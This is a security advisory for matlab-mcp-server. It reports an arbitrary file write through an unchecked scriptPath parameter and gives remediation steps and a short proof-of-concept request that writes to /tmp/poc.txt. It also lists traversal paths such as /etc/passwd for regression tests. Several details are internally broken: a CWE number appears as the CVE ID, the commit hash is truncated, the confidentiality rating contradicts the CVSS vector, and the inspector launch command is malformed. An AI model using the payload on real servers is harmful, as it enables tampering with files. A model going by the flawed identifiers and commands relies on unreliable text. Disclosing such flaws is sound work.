# Vulnerability Summary: matlab-mcp-server Arbitrary File Write Vulnerability ## Overview * **Vulnerability Name**: Arbitrary File Write Vulnerability in matlab-mcp-server * **CVE ID**: CVE-22 (Improper Limitation of a Pathname to a Restricted Directory) * **Vulnerability Type**: Arbitrary File Write (CWE-22) * **Discoverer**: Bruce2in (Brucelgs) * **Report Date**: April 12, 2026 * **Affected Component**: `src/index.ts` * **Root Cause**: The `generate_matlab_code` and `execute_matlab_code` tools accept a user-provided `scriptPath` parameter and use it directly as the file system write target without performing secure directory restrictions or path traversal checks. ## Impact Scope * **Affected Version**: Commit `aba88e6e9f5f3f775e8828029f7f6dd6d9512ca` confirmed affected. * **Attack Prerequisites**: * Attacker can invoke the exposed MCP tools of the affected matlab-mcp-server instance. * The `generate_matlab_code` or `execute_matlab_code` tools are reachable by the attacker. * The server process has file system write permissions for the target path chosen by the attacker. * No valid authentication, authorization, sandboxing, or path restrictions required. * MATLAB installation is not needed to reproduce the `generate_matlab_code` write primitive. * **Security Impact**: * **Confidentiality**: Low (demonstrates a write primitive, not direct read). * **Integrity**: High (attacker-controlled content can be written to any writable file system location). * **Availability**: High (attacker-controlled writes can corrupt application files, configuration files, startup scripts, or user data). * **Scope**: Unchanged. * **Suggested CVSS v3.1**: * Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` * Base Score: 9.4 (Critical) ## Remediation 1. **Eliminate** the documented data flow from request to arbitrary file write. 2. **Resolve** `scriptPath` with `path.resolve` relative to a trusted base directory, then compare the resolved path to perform explicit directory-aware boundary checks. 3. **Reject** absolute paths unless they are explicitly allowed and remain within the permitted base directory. 4. **Remove** the `scriptPath` parameter (if arbitrary output paths are unnecessary), and generate a server-controlled filename located in a safe directory. 5. **Add** regression tests proving that paths such as `/tmp/poc.txt`, `/etc/passwd`, and `../../outside-workspace.txt` cannot be written via `generate_matlab_code` or `execute_matlab_code`. 6. **Publish** a maintainer security advisory once the patch is released. ## Proof-of-Concept (POC) Code **1. Start the Affected Server (MCP Inspector)** ```bash cd matlab-mcp-server npm install npm run build npm @develohpanda/mcp-protocol/inspector node build/index.js ``` **2. Reproduce Request (Invoke generate_matlab_code Tool)** ```json { "description": "POC_ARBITRARY_FILE_WRITE_TXT", "saveScript": true, "scriptPath": "/tmp/poc.txt" } ``` **3. Verification** ```bash cat /tmp/poc.txt ``` Confirm the file exists and contains: ``` POC_ARBITRARY_FILE_WRITE_TXT ```